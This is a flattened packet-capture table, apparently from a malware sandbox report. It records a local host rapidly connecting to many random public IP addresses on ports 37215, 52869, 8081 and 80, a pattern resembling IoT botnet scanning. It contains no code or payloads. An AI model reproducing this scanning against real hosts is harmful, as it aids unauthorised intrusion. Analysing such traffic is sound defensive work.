                                                Jul 20, 2024 23:05:33.104479074 CEST5009237215192.168.2.14157.244.153.74
                                                Jul 20, 2024 23:05:33.106077909 CEST564708081192.168.2.14154.14.145.41
                                                Jul 20, 2024 23:05:33.107184887 CEST5201680192.168.2.1495.104.136.90
                                                Jul 20, 2024 23:05:33.109203100 CEST3721550092157.244.153.74192.168.2.14
                                                Jul 20, 2024 23:05:33.109242916 CEST5009237215192.168.2.14157.244.153.74
                                                Jul 20, 2024 23:05:33.110840082 CEST808156470154.14.145.41192.168.2.14
                                                Jul 20, 2024 23:05:33.110883951 CEST564708081192.168.2.14154.14.145.41
                                                Jul 20, 2024 23:05:33.111571074 CEST5625237215192.168.2.14120.191.233.247
                                                Jul 20, 2024 23:05:33.112066984 CEST805201695.104.136.90192.168.2.14
                                                Jul 20, 2024 23:05:33.112188101 CEST5201680192.168.2.1495.104.136.90
                                                Jul 20, 2024 23:05:33.112890005 CEST5620652869192.168.2.14148.2.12.125
                                                Jul 20, 2024 23:05:33.113413095 CEST5639280192.168.2.1495.213.60.63
                                                Jul 20, 2024 23:05:33.114109993 CEST511848081192.168.2.1472.133.157.196
                                                Jul 20, 2024 23:05:33.116389036 CEST3721556252120.191.233.247192.168.2.14
                                                Jul 20, 2024 23:05:33.116466999 CEST5625237215192.168.2.14120.191.233.247
                                                Jul 20, 2024 23:05:33.118640900 CEST4859037215192.168.2.14157.183.110.42
                                                Jul 20, 2024 23:05:33.119704962 CEST516628081192.168.2.14117.59.50.117
                                                Jul 20, 2024 23:05:33.120665073 CEST5169480192.168.2.1495.57.6.186
                                                Jul 20, 2024 23:05:33.121081114 CEST5286956206148.2.12.125192.168.2.14
                                                Jul 20, 2024 23:05:33.121087074 CEST805639295.213.60.63192.168.2.14
                                                Jul 20, 2024 23:05:33.121092081 CEST80815118472.133.157.196192.168.2.14
                                                Jul 20, 2024 23:05:33.121165037 CEST5620652869192.168.2.14148.2.12.125
                                                Jul 20, 2024 23:05:33.121165037 CEST511848081192.168.2.1472.133.157.196
                                                Jul 20, 2024 23:05:33.121166945 CEST5639280192.168.2.1495.213.60.63
                                                Jul 20, 2024 23:05:33.123457909 CEST4573837215192.168.2.14197.48.133.159
                                                Jul 20, 2024 23:05:33.124758959 CEST5579852869192.168.2.14125.66.54.149
                                                Jul 20, 2024 23:05:33.125050068 CEST3721548590157.183.110.42192.168.2.14
                                                Jul 20, 2024 23:05:33.125319958 CEST4859037215192.168.2.14157.183.110.42
                                                Jul 20, 2024 23:05:33.125998974 CEST453068081192.168.2.14141.98.245.55
                                                Jul 20, 2024 23:05:33.126199961 CEST808151662117.59.50.117192.168.2.14
                                                Jul 20, 2024 23:05:33.126796007 CEST516628081192.168.2.14117.59.50.117
                                                Jul 20, 2024 23:05:33.127173901 CEST4044680192.168.2.1495.62.179.67
                                                Jul 20, 2024 23:05:33.127202988 CEST805169495.57.6.186192.168.2.14
                                                Jul 20, 2024 23:05:33.127511024 CEST5169480192.168.2.1495.57.6.186
                                                Jul 20, 2024 23:05:33.129164934 CEST3721545738197.48.133.159192.168.2.14
                                                Jul 20, 2024 23:05:33.129348040 CEST4573837215192.168.2.14197.48.133.159
                                                Jul 20, 2024 23:05:33.129607916 CEST5286955798125.66.54.149192.168.2.14
                                                Jul 20, 2024 23:05:33.130098104 CEST5579852869192.168.2.14125.66.54.149
                                                Jul 20, 2024 23:05:33.130425930 CEST4932037215192.168.2.1491.98.242.170
                                                Jul 20, 2024 23:05:33.130779982 CEST808145306141.98.245.55192.168.2.14
                                                Jul 20, 2024 23:05:33.130860090 CEST453068081192.168.2.14141.98.245.55
                                                Jul 20, 2024 23:05:33.132257938 CEST804044695.62.179.67192.168.2.14
                                                Jul 20, 2024 23:05:33.132325888 CEST4044680192.168.2.1495.62.179.67
                                                Jul 20, 2024 23:05:33.133486032 CEST5657080192.168.2.1495.139.191.115
                                                Jul 20, 2024 23:05:33.133923054 CEST405628081192.168.2.1419.66.111.46
                                                Jul 20, 2024 23:05:33.135195017 CEST372154932091.98.242.170192.168.2.14
                                                Jul 20, 2024 23:05:33.135462046 CEST4932037215192.168.2.1491.98.242.170
                                                Jul 20, 2024 23:05:33.138395071 CEST805657095.139.191.115192.168.2.14
                                                Jul 20, 2024 23:05:33.138673067 CEST5657080192.168.2.1495.139.191.115
                                                Jul 20, 2024 23:05:33.138736963 CEST80814056219.66.111.46192.168.2.14
                                                Jul 20, 2024 23:05:33.138789892 CEST405628081192.168.2.1419.66.111.46
                                                Jul 20, 2024 23:05:33.139013052 CEST5336652869192.168.2.14187.189.79.198
                                                Jul 20, 2024 23:05:33.139697075 CEST4267637215192.168.2.1441.156.206.214
                                                Jul 20, 2024 23:05:33.142920971 CEST4036280192.168.2.1495.41.85.63
                                                Jul 20, 2024 23:05:33.143254042 CEST368948081192.168.2.1464.8.192.151
                                                Jul 20, 2024 23:05:33.144150972 CEST5286953366187.189.79.198192.168.2.14
                                                Jul 20, 2024 23:05:33.144512892 CEST5336652869192.168.2.14187.189.79.198
                                                Jul 20, 2024 23:05:33.145459890 CEST372154267641.156.206.214192.168.2.14
                                                Jul 20, 2024 23:05:33.145777941 CEST4267637215192.168.2.1441.156.206.214
                                                Jul 20, 2024 23:05:33.147803068 CEST804036295.41.85.63192.168.2.14
                                                Jul 20, 2024 23:05:33.147918940 CEST4357437215192.168.2.14157.42.169.126
                                                Jul 20, 2024 23:05:33.147991896 CEST80813689464.8.192.151192.168.2.14
                                                Jul 20, 2024 23:05:33.147993088 CEST4036280192.168.2.1495.41.85.63
                                                Jul 20, 2024 23:05:33.148504972 CEST368948081192.168.2.1464.8.192.151
                                                Jul 20, 2024 23:05:33.150655985 CEST4351080192.168.2.1495.232.173.19
                                                Jul 20, 2024 23:05:33.151690006 CEST350968081192.168.2.1497.4.105.89
                                                Jul 20, 2024 23:05:33.152717113 CEST3721543574157.42.169.126192.168.2.14
                                                Jul 20, 2024 23:05:33.152812004 CEST4357437215192.168.2.14157.42.169.126
                                                Jul 20, 2024 23:05:33.154061079 CEST6062852869192.168.2.1452.136.210.121
                                                Jul 20, 2024 23:05:33.156845093 CEST3776637215192.168.2.14141.199.59.173
                                                Jul 20, 2024 23:05:33.157588959 CEST804351095.232.173.19192.168.2.14
                                                Jul 20, 2024 23:05:33.157715082 CEST4351080192.168.2.1495.232.173.19
                                                Jul 20, 2024 23:05:33.157718897 CEST80813509697.4.105.89192.168.2.14
                                                Jul 20, 2024 23:05:33.157785892 CEST350968081192.168.2.1497.4.105.89
                                                Jul 20, 2024 23:05:33.158219099 CEST409828081192.168.2.14221.8.209.126
                                                Jul 20, 2024 23:05:33.159008980 CEST3934080192.168.2.1495.36.201.87
                                                Jul 20, 2024 23:05:33.160500050 CEST528696062852.136.210.121192.168.2.14
                                                Jul 20, 2024 23:05:33.160547018 CEST6062852869192.168.2.1452.136.210.121
                                                Jul 20, 2024 23:05:33.161778927 CEST4539237215192.168.2.14157.233.53.190
                                                Jul 20, 2024 23:05:33.163429976 CEST3721537766141.199.59.173192.168.2.14
                                                Jul 20, 2024 23:05:33.163526058 CEST3776637215192.168.2.14141.199.59.173
                                                Jul 20, 2024 23:05:33.164438009 CEST808140982221.8.209.126192.168.2.14
                                                Jul 20, 2024 23:05:33.164503098 CEST409828081192.168.2.14221.8.209.126
                                                Jul 20, 2024 23:05:33.164695978 CEST508108081192.168.2.14160.169.251.238
                                                Jul 20, 2024 23:05:33.165406942 CEST803934095.36.201.87192.168.2.14
                                                Jul 20, 2024 23:05:33.165507078 CEST5569280192.168.2.1495.55.62.244
                                                Jul 20, 2024 23:05:33.166568995 CEST4287452869192.168.2.14174.38.108.83
                                                Jul 20, 2024 23:05:33.168191910 CEST3721545392157.233.53.190192.168.2.14
                                                Jul 20, 2024 23:05:33.168302059 CEST6031237215192.168.2.14211.45.136.152
                                                Jul 20, 2024 23:05:33.168349981 CEST4539237215192.168.2.14157.233.53.190
                                                Jul 20, 2024 23:05:33.170494080 CEST3461880192.168.2.1495.156.74.111
                                                Jul 20, 2024 23:05:33.171055079 CEST808150810160.169.251.238192.168.2.14
                                                Jul 20, 2024 23:05:33.171082973 CEST529148081192.168.2.1442.126.204.24
                                                Jul 20, 2024 23:05:33.171128035 CEST508108081192.168.2.14160.169.251.238
                                                Jul 20, 2024 23:05:33.171955109 CEST805569295.55.62.244192.168.2.14
                                                Jul 20, 2024 23:05:33.171998024 CEST5569280192.168.2.1495.55.62.244
                                                Jul 20, 2024 23:05:33.172921896 CEST5286942874174.38.108.83192.168.2.14
                                                Jul 20, 2024 23:05:33.172972918 CEST4287452869192.168.2.14174.38.108.83
                                                Jul 20, 2024 23:05:33.174601078 CEST3721560312211.45.136.152192.168.2.14
                                                Jul 20, 2024 23:05:33.174900055 CEST6031237215192.168.2.14211.45.136.152
                                                Jul 20, 2024 23:05:33.175597906 CEST4938037215192.168.2.1441.185.62.167
                                                Jul 20, 2024 23:05:33.176501036 CEST3934080192.168.2.1495.36.201.87
                                                Jul 20, 2024 23:05:33.176888943 CEST803461895.156.74.111192.168.2.14
                                                Jul 20, 2024 23:05:33.177035093 CEST3461880192.168.2.1495.156.74.111
                                                Jul 20, 2024 23:05:33.177036047 CEST442648081192.168.2.1465.131.57.149
                                                Jul 20, 2024 23:05:33.177361012 CEST80815291442.126.204.24192.168.2.14
                                                Jul 20, 2024 23:05:33.177501917 CEST529148081192.168.2.1442.126.204.24
                                                Jul 20, 2024 23:05:33.177726984 CEST5783480192.168.2.1495.158.80.43
                                                Jul 20, 2024 23:05:33.178766012 CEST5071652869192.168.2.141.200.111.50
                                                Jul 20, 2024 23:05:33.181714058 CEST4987037215192.168.2.14181.89.181.103
                                                Jul 20, 2024 23:05:33.182086945 CEST372154938041.185.62.167192.168.2.14
                                                Jul 20, 2024 23:05:33.182132959 CEST4938037215192.168.2.1441.185.62.167
                                                Jul 20, 2024 23:05:33.183008909 CEST396468081192.168.2.1452.83.62.134
                                                Jul 20, 2024 23:05:33.183625937 CEST80814426465.131.57.149192.168.2.14
                                                Jul 20, 2024 23:05:33.183707952 CEST442648081192.168.2.1465.131.57.149
                                                Jul 20, 2024 23:05:33.183932066 CEST3927480192.168.2.1495.121.142.215
                                                Jul 20, 2024 23:05:33.184196949 CEST805783495.158.80.43192.168.2.14
                                                Jul 20, 2024 23:05:33.184489012 CEST5783480192.168.2.1495.158.80.43
                                                Jul 20, 2024 23:05:33.185255051 CEST52869507161.200.111.50192.168.2.14
                                                Jul 20, 2024 23:05:33.185307026 CEST5071652869192.168.2.141.200.111.50
                                                Jul 20, 2024 23:05:33.186904907 CEST5771637215192.168.2.14197.164.23.3
                                                Jul 20, 2024 23:05:33.188138008 CEST3721549870181.89.181.103192.168.2.14
                                                Jul 20, 2024 23:05:33.188606024 CEST4987037215192.168.2.14181.89.181.103
                                                Jul 20, 2024 23:05:33.189094067 CEST80813964652.83.62.134192.168.2.14
                                                Jul 20, 2024 23:05:33.189100981 CEST803927495.121.142.215192.168.2.14
                                                Jul 20, 2024 23:05:33.189138889 CEST3927480192.168.2.1495.121.142.215
                                                Jul 20, 2024 23:05:33.189171076 CEST396468081192.168.2.1452.83.62.134
                                                Jul 20, 2024 23:05:33.189481020 CEST449668081192.168.2.14162.1.131.232
                                                Jul 20, 2024 23:05:33.189615965 CEST5546452869192.168.2.14159.94.41.117
                                                Jul 20, 2024 23:05:33.189941883 CEST3792280192.168.2.1495.115.64.83
                                                Jul 20, 2024 23:05:33.191746950 CEST3721557716197.164.23.3192.168.2.14
                                                Jul 20, 2024 23:05:33.191900969 CEST5771637215192.168.2.14197.164.23.3
                                                Jul 20, 2024 23:05:33.192687988 CEST3759437215192.168.2.14197.209.199.16
                                                Jul 20, 2024 23:05:33.194396973 CEST4706280192.168.2.1495.31.158.7
                                                Jul 20, 2024 23:05:33.194792986 CEST808144966162.1.131.232192.168.2.14
                                                Jul 20, 2024 23:05:33.194809914 CEST5286955464159.94.41.117192.168.2.14
                                                Jul 20, 2024 23:05:33.194814920 CEST803792295.115.64.83192.168.2.14
                                                Jul 20, 2024 23:05:33.194921017 CEST3792280192.168.2.1495.115.64.83
                                                Jul 20, 2024 23:05:33.194935083 CEST5546452869192.168.2.14159.94.41.117
                                                Jul 20, 2024 23:05:33.194936037 CEST449668081192.168.2.14162.1.131.232
                                                Jul 20, 2024 23:05:33.195034981 CEST350608081192.168.2.1425.156.123.151
                                                Jul 20, 2024 23:05:33.197581053 CEST3721537594197.209.199.16192.168.2.14
                                                Jul 20, 2024 23:05:33.197655916 CEST3759437215192.168.2.14197.209.199.16
                                                Jul 20, 2024 23:05:33.198196888 CEST4387837215192.168.2.14197.52.105.112
                                                Jul 20, 2024 23:05:33.199295044 CEST804706295.31.158.7192.168.2.14
                                                Jul 20, 2024 23:05:33.199383020 CEST4706280192.168.2.1495.31.158.7
                                                Jul 20, 2024 23:05:33.199493885 CEST3662652869192.168.2.14184.192.255.233
                                                Jul 20, 2024 23:05:33.199839115 CEST80813506025.156.123.151192.168.2.14
                                                Jul 20, 2024 23:05:33.199846983 CEST4388480192.168.2.1495.59.184.231
                                                Jul 20, 2024 23:05:33.199949026 CEST350608081192.168.2.1425.156.123.151
                                                Jul 20, 2024 23:05:33.200508118 CEST563768081192.168.2.1472.126.240.254
                                                Jul 20, 2024 23:05:33.203018904 CEST3721543878197.52.105.112192.168.2.14
                                                Jul 20, 2024 23:05:33.203083992 CEST4387837215192.168.2.14197.52.105.112
                                                Jul 20, 2024 23:05:33.204313993 CEST5286936626184.192.255.233192.168.2.14
                                                Jul 20, 2024 23:05:33.204745054 CEST804388495.59.184.231192.168.2.14
                                                Jul 20, 2024 23:05:33.204791069 CEST3662652869192.168.2.14184.192.255.233
                                                Jul 20, 2024 23:05:33.204818964 CEST4388480192.168.2.1495.59.184.231
                                                Jul 20, 2024 23:05:33.205264091 CEST80815637672.126.240.254192.168.2.14
                                                Jul 20, 2024 23:05:33.205852985 CEST563768081192.168.2.1472.126.240.254
                                                Jul 20, 2024 23:05:33.208981037 CEST5658237215192.168.2.14157.14.174.37
                                                Jul 20, 2024 23:05:33.210200071 CEST596768081192.168.2.1481.104.141.158
                                                Jul 20, 2024 23:05:33.210760117 CEST5688280192.168.2.1495.57.115.181
                                                Jul 20, 2024 23:05:33.213972092 CEST3721556582157.14.174.37192.168.2.14
                                                Jul 20, 2024 23:05:33.214029074 CEST5658237215192.168.2.14157.14.174.37
                                                Jul 20, 2024 23:05:33.214885950 CEST4714452869192.168.2.1413.122.59.167
                                                Jul 20, 2024 23:05:33.214891911 CEST4685037215192.168.2.14157.22.107.208
                                                Jul 20, 2024 23:05:33.215029001 CEST80815967681.104.141.158192.168.2.14
                                                Jul 20, 2024 23:05:33.215074062 CEST596768081192.168.2.1481.104.141.158
                                                Jul 20, 2024 23:05:33.215847969 CEST569068081192.168.2.14168.224.43.165
                                                Jul 20, 2024 23:05:33.216315985 CEST805688295.57.115.181192.168.2.14
                                                Jul 20, 2024 23:05:33.216362000 CEST5688280192.168.2.1495.57.115.181
                                                Jul 20, 2024 23:05:33.216547966 CEST5788480192.168.2.1495.136.249.39
                                                Jul 20, 2024 23:05:33.219579935 CEST5361237215192.168.2.1441.165.255.30
                                                Jul 20, 2024 23:05:33.220010996 CEST3721546850157.22.107.208192.168.2.14
                                                Jul 20, 2024 23:05:33.220017910 CEST528694714413.122.59.167192.168.2.14
                                                Jul 20, 2024 23:05:33.220379114 CEST4714452869192.168.2.1413.122.59.167
                                                Jul 20, 2024 23:05:33.220381975 CEST4685037215192.168.2.14157.22.107.208
                                                Jul 20, 2024 23:05:33.220673084 CEST808156906168.224.43.165192.168.2.14
                                                Jul 20, 2024 23:05:33.220804930 CEST540848081192.168.2.1475.195.2.205
                                                Jul 20, 2024 23:05:33.220848083 CEST569068081192.168.2.14168.224.43.165
                                                Jul 20, 2024 23:05:33.221332073 CEST805788495.136.249.39192.168.2.14
                                                Jul 20, 2024 23:05:33.221630096 CEST5788480192.168.2.1495.136.249.39
                                                Jul 20, 2024 23:05:33.222243071 CEST5477680192.168.2.1495.77.250.166
                                                Jul 20, 2024 23:05:33.224472046 CEST372155361241.165.255.30192.168.2.14
                                                Jul 20, 2024 23:05:33.224540949 CEST5361237215192.168.2.1441.165.255.30
                                                Jul 20, 2024 23:05:33.225819111 CEST80815408475.195.2.205192.168.2.14
                                                Jul 20, 2024 23:05:33.225871086 CEST540848081192.168.2.1475.195.2.205
                                                Jul 20, 2024 23:05:33.227145910 CEST805477695.77.250.166192.168.2.14
                                                Jul 20, 2024 23:05:33.227214098 CEST5477680192.168.2.1495.77.250.166
                                                Jul 20, 2024 23:05:33.228328943 CEST5335852869192.168.2.1474.170.109.218
                                                Jul 20, 2024 23:05:33.228466988 CEST5415837215192.168.2.1441.28.13.220
                                                Jul 20, 2024 23:05:33.229532003 CEST375048081192.168.2.14108.194.57.178
                                                Jul 20, 2024 23:05:33.230283022 CEST4741680192.168.2.1495.182.35.196
                                                Jul 20, 2024 23:05:33.233103991 CEST528695335874.170.109.218192.168.2.14
                                                Jul 20, 2024 23:05:33.233268023 CEST372155415841.28.13.220192.168.2.14
                                                Jul 20, 2024 23:05:33.233521938 CEST5415837215192.168.2.1441.28.13.220
                                                Jul 20, 2024 23:05:33.233521938 CEST5335852869192.168.2.1474.170.109.218
                                                Jul 20, 2024 23:05:33.233923912 CEST5611637215192.168.2.14157.184.79.183
                                                Jul 20, 2024 23:05:33.234407902 CEST808137504108.194.57.178192.168.2.14
                                                Jul 20, 2024 23:05:33.234512091 CEST375048081192.168.2.14108.194.57.178
                                                Jul 20, 2024 23:05:33.235121965 CEST804741695.182.35.196192.168.2.14
                                                Jul 20, 2024 23:05:33.235181093 CEST4741680192.168.2.1495.182.35.196
                                                Jul 20, 2024 23:05:33.236460924 CEST538948081192.168.2.14210.161.174.194
                                                Jul 20, 2024 23:05:33.237293005 CEST4240080192.168.2.1495.75.247.171
                                                Jul 20, 2024 23:05:33.238792896 CEST3721556116157.184.79.183192.168.2.14
                                                Jul 20, 2024 23:05:33.239928007 CEST5611637215192.168.2.14157.184.79.183
                                                Jul 20, 2024 23:05:33.241280079 CEST808153894210.161.174.194192.168.2.14
                                                Jul 20, 2024 23:05:33.241370916 CEST538948081192.168.2.14210.161.174.194
                                                Jul 20, 2024 23:05:33.241370916 CEST5706652869192.168.2.14133.8.172.164
                                                Jul 20, 2024 23:05:33.242155075 CEST804240095.75.247.171192.168.2.14
                                                Jul 20, 2024 23:05:33.242213964 CEST4316437215192.168.2.1441.93.186.26
                                                Jul 20, 2024 23:05:33.242270947 CEST4240080192.168.2.1495.75.247.171
                                                Jul 20, 2024 23:05:33.243598938 CEST405868081192.168.2.1443.140.207.90
                                                Jul 20, 2024 23:05:33.244317055 CEST5682480192.168.2.1495.237.41.55
                                                Jul 20, 2024 23:05:33.246259928 CEST5286957066133.8.172.164192.168.2.14
                                                Jul 20, 2024 23:05:33.246319056 CEST5706652869192.168.2.14133.8.172.164
                                                Jul 20, 2024 23:05:33.247056961 CEST372154316441.93.186.26192.168.2.14
                                                Jul 20, 2024 23:05:33.247123003 CEST4316437215192.168.2.1441.93.186.26
                                                Jul 20, 2024 23:05:33.247400045 CEST5378237215192.168.2.14157.176.218.10
                                                Jul 20, 2024 23:05:33.248215914 CEST466888081192.168.2.14123.249.239.40
                                                Jul 20, 2024 23:05:33.248668909 CEST3911480192.168.2.1495.243.3.180
                                                Jul 20, 2024 23:05:33.248668909 CEST80814058643.140.207.90192.168.2.14
                                                Jul 20, 2024 23:05:33.248789072 CEST405868081192.168.2.1443.140.207.90
                                                Jul 20, 2024 23:05:33.249475002 CEST805682495.237.41.55192.168.2.14
                                                Jul 20, 2024 23:05:33.249540091 CEST5682480192.168.2.1495.237.41.55
                                                Jul 20, 2024 23:05:33.250478983 CEST4644452869192.168.2.1457.131.227.3
                                                Jul 20, 2024 23:05:33.250586987 CEST3585637215192.168.2.14197.219.134.66
                                                Jul 20, 2024 23:05:33.252194881 CEST4161480192.168.2.1495.12.251.221
                                                Jul 20, 2024 23:05:33.252619028 CEST575968081192.168.2.1470.210.95.222
                                                Jul 20, 2024 23:05:33.253030062 CEST3721553782157.176.218.10192.168.2.14
                                                Jul 20, 2024 23:05:33.253074884 CEST5378237215192.168.2.14157.176.218.10
                                                Jul 20, 2024 23:05:33.253412008 CEST808146688123.249.239.40192.168.2.14
                                                Jul 20, 2024 23:05:33.253417969 CEST803911495.243.3.180192.168.2.14
                                                Jul 20, 2024 23:05:33.253473043 CEST466888081192.168.2.14123.249.239.40
                                                Jul 20, 2024 23:05:33.253473043 CEST3911480192.168.2.1495.243.3.180
                                                Jul 20, 2024 23:05:33.255449057 CEST528694644457.131.227.3192.168.2.14
                                                Jul 20, 2024 23:05:33.255456924 CEST3721535856197.219.134.66192.168.2.14
                                                Jul 20, 2024 23:05:33.255491972 CEST4644452869192.168.2.1457.131.227.3
                                                Jul 20, 2024 23:05:33.255497932 CEST3585637215192.168.2.14197.219.134.66
                                                Jul 20, 2024 23:05:33.256669044 CEST3844637215192.168.2.1441.122.250.164
                                                Jul 20, 2024 23:05:33.257038116 CEST804161495.12.251.221192.168.2.14
                                                Jul 20, 2024 23:05:33.257117033 CEST4161480192.168.2.1495.12.251.221
                                                Jul 20, 2024 23:05:33.257597923 CEST508768081192.168.2.14137.216.162.82
                                                Jul 20, 2024 23:05:33.257832050 CEST80815759670.210.95.222192.168.2.14
                                                Jul 20, 2024 23:05:33.257879019 CEST575968081192.168.2.1470.210.95.222
                                                Jul 20, 2024 23:05:33.258537054 CEST5717680192.168.2.1495.7.161.207
                                                Jul 20, 2024 23:05:33.261538029 CEST372153844641.122.250.164192.168.2.14
                                                Jul 20, 2024 23:05:33.261579037 CEST4435452869192.168.2.1464.104.54.14
                                                Jul 20, 2024 23:05:33.261610985 CEST3844637215192.168.2.1441.122.250.164
                                                Jul 20, 2024 23:05:33.262382984 CEST808150876137.216.162.82192.168.2.14
                                                Jul 20, 2024 23:05:33.262428999 CEST508768081192.168.2.14137.216.162.82
                                                Jul 20, 2024 23:05:33.263403893 CEST805717695.7.161.207192.168.2.14
                                                Jul 20, 2024 23:05:33.263439894 CEST5717680192.168.2.1495.7.161.207
                                                Jul 20, 2024 23:05:33.263767958 CEST4873837215192.168.2.14197.38.240.133
                                                Jul 20, 2024 23:05:33.265178919 CEST5064880192.168.2.1495.207.149.105
                                                Jul 20, 2024 23:05:33.266350985 CEST603468081192.168.2.1461.74.35.59
                                                Jul 20, 2024 23:05:33.266541004 CEST528694435464.104.54.14192.168.2.14
                                                Jul 20, 2024 23:05:33.266598940 CEST4435452869192.168.2.1464.104.54.14
                                                Jul 20, 2024 23:05:33.268739939 CEST3721548738197.38.240.133192.168.2.14
                                                Jul 20, 2024 23:05:33.268786907 CEST4873837215192.168.2.14197.38.240.133
                                                Jul 20, 2024 23:05:33.270014048 CEST805064895.207.149.105192.168.2.14
                                                Jul 20, 2024 23:05:33.270106077 CEST5064880192.168.2.1495.207.149.105
                                                Jul 20, 2024 23:05:33.270211935 CEST539048081192.168.2.14196.160.77.207
                                                Jul 20, 2024 23:05:33.270576000 CEST5995037215192.168.2.14157.33.158.151
                                                Jul 20, 2024 23:05:33.270802975 CEST3567480192.168.2.1495.220.243.61
                                                Jul 20, 2024 23:05:33.271486044 CEST80816034661.74.35.59192.168.2.14
                                                Jul 20, 2024 23:05:33.271620989 CEST603468081192.168.2.1461.74.35.59
                                                Jul 20, 2024 23:05:33.274910927 CEST4480252869192.168.2.14157.104.97.161
                                                Jul 20, 2024 23:05:33.275063038 CEST808153904196.160.77.207192.168.2.14
                                                Jul 20, 2024 23:05:33.275114059 CEST539048081192.168.2.14196.160.77.207
                                                Jul 20, 2024 23:05:33.275419950 CEST3721559950157.33.158.151192.168.2.14
                                                Jul 20, 2024 23:05:33.275459051 CEST5995037215192.168.2.14157.33.158.151
                                                Jul 20, 2024 23:05:33.275542974 CEST803567495.220.243.61192.168.2.14
                                                Jul 20, 2024 23:05:33.275643110 CEST3567480192.168.2.1495.220.243.61
                                                Jul 20, 2024 23:05:33.277138948 CEST3769480192.168.2.1495.246.233.118
                                                Jul 20, 2024 23:05:33.278227091 CEST344188081192.168.2.14195.101.202.121
                                                Jul 20, 2024 23:05:33.278532982 CEST5504637215192.168.2.1424.82.183.93
                                                Jul 20, 2024 23:05:33.279815912 CEST5286944802157.104.97.161192.168.2.14
                                                Jul 20, 2024 23:05:33.279913902 CEST4480252869192.168.2.14157.104.97.161
                                                Jul 20, 2024 23:05:33.282026052 CEST803769495.246.233.118192.168.2.14
                                                Jul 20, 2024 23:05:33.282104969 CEST3769480192.168.2.1495.246.233.118
                                                Jul 20, 2024 23:05:33.283107996 CEST808134418195.101.202.121192.168.2.14
                                                Jul 20, 2024 23:05:33.283307076 CEST6025080192.168.2.1495.211.239.130
                                                Jul 20, 2024 23:05:33.283308983 CEST344188081192.168.2.14195.101.202.121
                                                Jul 20, 2024 23:05:33.283314943 CEST372155504624.82.183.93192.168.2.14
                                                Jul 20, 2024 23:05:33.283371925 CEST5504637215192.168.2.1424.82.183.93
                                                Jul 20, 2024 23:05:33.283864975 CEST385028081192.168.2.14139.94.219.97
                                                Jul 20, 2024 23:05:33.284073114 CEST5461237215192.168.2.14197.152.207.21
                                                Jul 20, 2024 23:05:33.285137892 CEST5588852869192.168.2.1462.5.163.114
                                                Jul 20, 2024 23:05:33.288249969 CEST806025095.211.239.130192.168.2.14
                                                Jul 20, 2024 23:05:33.288305044 CEST6025080192.168.2.1495.211.239.130
                                                Jul 20, 2024 23:05:33.288664103 CEST808138502139.94.219.97192.168.2.14
                                                Jul 20, 2024 23:05:33.288861990 CEST3721554612197.152.207.21192.168.2.14
                                                Jul 20, 2024 23:05:33.288932085 CEST385028081192.168.2.14139.94.219.97
                                                Jul 20, 2024 23:05:33.288957119 CEST5461237215192.168.2.14197.152.207.21
                                                Jul 20, 2024 23:05:33.289180040 CEST4780637215192.168.2.14157.183.5.146
                                                Jul 20, 2024 23:05:33.289961100 CEST528695588862.5.163.114192.168.2.14
                                                Jul 20, 2024 23:05:33.289982080 CEST4655680192.168.2.1495.106.187.139
                                                Jul 20, 2024 23:05:33.290000916 CEST5588852869192.168.2.1462.5.163.114
                                                Jul 20, 2024 23:05:33.290564060 CEST352288081192.168.2.1465.148.167.225
                                                Jul 20, 2024 23:05:33.294219017 CEST3721547806157.183.5.146192.168.2.14
                                                Jul 20, 2024 23:05:33.294347048 CEST4780637215192.168.2.14157.183.5.146
                                                Jul 20, 2024 23:05:33.294799089 CEST804655695.106.187.139192.168.2.14
                                                Jul 20, 2024 23:05:33.294966936 CEST4655680192.168.2.1495.106.187.139
                                                Jul 20, 2024 23:05:33.295403957 CEST80813522865.148.167.225192.168.2.14
                                                Jul 20, 2024 23:05:33.295583963 CEST352288081192.168.2.1465.148.167.225
                                                Jul 20, 2024 23:05:33.296930075 CEST4185837215192.168.2.1441.247.46.12
                                                Jul 20, 2024 23:05:33.297621012 CEST4869280192.168.2.1495.171.109.242
                                                Jul 20, 2024 23:05:33.298783064 CEST397668081192.168.2.14154.164.49.148
                                                Jul 20, 2024 23:05:33.299118996 CEST3806852869192.168.2.14190.231.104.96
                                                Jul 20, 2024 23:05:33.301834106 CEST372154185841.247.46.12192.168.2.14
                                                Jul 20, 2024 23:05:33.301974058 CEST4185837215192.168.2.1441.247.46.12
                                                Jul 20, 2024 23:05:33.302469969 CEST804869295.171.109.242192.168.2.14
                                                Jul 20, 2024 23:05:33.302563906 CEST4869280192.168.2.1495.171.109.242
                                                Jul 20, 2024 23:05:33.303118944 CEST4608437215192.168.2.14197.50.11.183
                                                Jul 20, 2024 23:05:33.303802967 CEST808139766154.164.49.148192.168.2.14
                                                Jul 20, 2024 23:05:33.303867102 CEST397668081192.168.2.14154.164.49.148
                                                Jul 20, 2024 23:05:33.303910971 CEST5286938068190.231.104.96192.168.2.14
                                                Jul 20, 2024 23:05:33.303977013 CEST3806852869192.168.2.14190.231.104.96
                                                Jul 20, 2024 23:05:33.305018902 CEST5471880192.168.2.1495.50.236.32
                                                Jul 20, 2024 23:05:33.305464983 CEST514888081192.168.2.14114.235.217.176
                                                Jul 20, 2024 23:05:33.307955980 CEST3721546084197.50.11.183192.168.2.14
                                                Jul 20, 2024 23:05:33.308032036 CEST4608437215192.168.2.14197.50.11.183
                                                Jul 20, 2024 23:05:33.309874058 CEST805471895.50.236.32192.168.2.14
                                                Jul 20, 2024 23:05:33.309951067 CEST5471880192.168.2.1495.50.236.32
                                                Jul 20, 2024 23:05:33.310239077 CEST808151488114.235.217.176192.168.2.14
                                                Jul 20, 2024 23:05:33.310291052 CEST514888081192.168.2.14114.235.217.176
                                                Jul 20, 2024 23:05:33.312077045 CEST5609237215192.168.2.1441.248.234.133
                                                Jul 20, 2024 23:05:33.314160109 CEST4979852869192.168.2.14204.66.149.99
                                                Jul 20, 2024 23:05:33.314737082 CEST4492680192.168.2.1495.187.58.238
                                                Jul 20, 2024 23:05:33.315699100 CEST501108081192.168.2.14197.160.53.246
                                                Jul 20, 2024 23:05:33.316965103 CEST372155609241.248.234.133192.168.2.14
                                                Jul 20, 2024 23:05:33.317198992 CEST5609237215192.168.2.1441.248.234.133
                                                Jul 20, 2024 23:05:33.318092108 CEST3939637215192.168.2.1441.248.125.74
                                                Jul 20, 2024 23:05:33.319011927 CEST5286949798204.66.149.99192.168.2.14
                                                Jul 20, 2024 23:05:33.319062948 CEST4979852869192.168.2.14204.66.149.99
                                                Jul 20, 2024 23:05:33.319600105 CEST804492695.187.58.238192.168.2.14
                                                Jul 20, 2024 23:05:33.319744110 CEST4492680192.168.2.1495.187.58.238
